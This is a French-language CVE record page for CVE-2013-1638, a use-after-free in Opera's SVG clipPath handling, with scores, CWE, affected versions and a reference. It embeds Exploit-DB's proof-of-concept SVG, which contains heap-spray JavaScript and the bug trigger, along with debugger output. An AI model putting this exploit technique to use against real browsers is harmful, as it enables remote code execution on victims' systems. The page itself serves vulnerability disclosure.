CVE-2013-1638
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 24448
Date de publication : 2013-02-04 23h00 +00:00
Auteur : Cons0ul
EDB Vérifié : Yes
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w0.org/1999/xlink">
<g id="group">
<defs>
<clipPath id="clip-circle" clip-path="url(#clip-rect)">
</clipPath>
<clipPath id="clip-rect">
</clipPath>
</defs>
<circle id="rect" x="10" y="10" width="100" height="100" fill="green" />
</g>
<script><![CDATA[
//Author=Cons0ul
var b = new Array();
// this is our spray function where spray is allocated on LFH with exact size 0x78
// so 0x78 size of block is created so far we are creating 0x50000 blocks
// to create 0x78 blocks we are using ArrayBuffer();
function feng_shui(){
for(i=0;i<1000;i++)window.opera.collect(); // <----- garbage collection
for(i=0;i<0x50000;i++){
payload = new ArrayBuffer(0x78) // use 0xb0 for 64bit machine
payload[0]=0x6c
payload[1]=0x03
payload[2]=0xfe
payload[3]=0x7f
b.push(payload)
}
}
// bug is use after free in handling of (use tag + clippath) witch try to access freed object
//
document.getElementById('rect').setAttribute('clip-path',"url(#clip-circle)");
var c = document.createElement('use');
c.setAttribute("xlink:href","rect")
feng_shui();
document.getElementById('clip-rect').appendChild(c);
document.getElementById('rect').style.clipPath="url(#clip-circle)" // <----- bug
window.opera.collect() // <------ gc() frees the allocation
feng_shui(); // <------------ we allocate our code at freed memory
// at the end it tries freed block witch contains our data
window.location.href=window.location.href;
/*
idc !heap -p -a ecx
address 077c45e0 found in
_HEAP @ b40000
HEAP_ENTRY Size Prev Flags UserPtr UserSize - state
077c45d8 0010 0000 [00] 077c45e0 00078 - (free)
PS C:\Users\cons0ul> idc db ecx
077c45e0 92 48 fe 7f 00 00 00 00-00 00 00 00 00 00 00 00 .H..............
077c45f0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4600 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4610 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4620 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4630 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4640 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
077c4650 00 00 00 00 00 00 00 00-89 d0 6a 5b 00 00 00 88 ..........j[....
PS C:\Users\cons0ul> idc r
eax=7ffe4892 ebx=00000001 ecx=077c45e0 edx=00000000 esi=0372e590 edi=01d40048
eip=6b8c998b esp=0013e334 ebp=00000000 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
Opera_6b430000!OpGetNextUninstallFile+0xf8583:
6b8c998b ff5008 call dword ptr [eax+8] ds:0023:7ffe489a=????????
*/
]]></script>
</svg>
Products Mentioned
Configuraton 0
Opera>>Opera_browser >> Version To (including) 12.12
- Opera>>Opera_browser >> Version - (Open CPE detail)
- Opera>>Opera_browser >> Version 1.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 2.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 2.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 2.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 2.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 2.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 2.12 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.21 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.51 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.61 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.62 (Open CPE detail)
- Opera>>Opera_browser >> Version 3.62 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 4.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.11 (Open CPE detail)
- Opera>>Opera_browser >> Version 5.12 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.1 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.1 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.03 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.04 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.05 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.06 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.11 (Open CPE detail)
- Opera>>Opera_browser >> Version 6.12 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.03 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.11 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.11 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.20 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.20 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.21 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.22 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.23 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.30 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.51 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.52 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.53 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.54 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.54 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.54 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.55 (Open CPE detail)
- Opera>>Opera_browser >> Version 7.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.51 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.52 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.53 (Open CPE detail)
- Opera>>Opera_browser >> Version 8.54 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.12 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.20 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.20 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.21 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.22 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.23 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.24 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.25 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.26 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.27 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.51 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.52 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.61 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.62 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.63 (Open CPE detail)
- Opera>>Opera_browser >> Version 9.64 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.11 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.20 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.51 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.52 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.52 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.52 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.53 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.53 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.53 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.54 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.61 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.62 (Open CPE detail)
- Opera>>Opera_browser >> Version 10.63 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.0 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.11 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.50 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.51 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.52 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.52.1100 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.60 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.61 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.62 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.64 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.65 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.66 (Open CPE detail)
- Opera>>Opera_browser >> Version 11.67 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.01 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.02 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.11 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.12 (Open CPE detail)
Opera>>Opera_browser >> Version 12.00
- Opera>>Opera_browser >> Version 12.00 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.00 (Open CPE detail)
Opera>>Opera_browser >> Version 12.00
- Opera>>Opera_browser >> Version 12.00 (Open CPE detail)
Opera>>Opera_browser >> Version 12.01
- Opera>>Opera_browser >> Version 12.01 (Open CPE detail)
Opera>>Opera_browser >> Version 12.02
- Opera>>Opera_browser >> Version 12.02 (Open CPE detail)
Opera>>Opera_browser >> Version 12.10
- Opera>>Opera_browser >> Version 12.10 (Open CPE detail)
- Opera>>Opera_browser >> Version 12.10 (Open CPE detail)
Opera>>Opera_browser >> Version 12.10
- Opera>>Opera_browser >> Version 12.10 (Open CPE detail)
Opera>>Opera_browser >> Version 12.11
- Opera>>Opera_browser >> Version 12.11 (Open CPE detail)
Références
http://lists.opensuse.org/opensuse-updates/2013-02/msg00038.html
Tags : vendor-advisory, x_refsource_SUSE
Tags : vendor-advisory, x_refsource_SUSE
2025©
tesweb SA
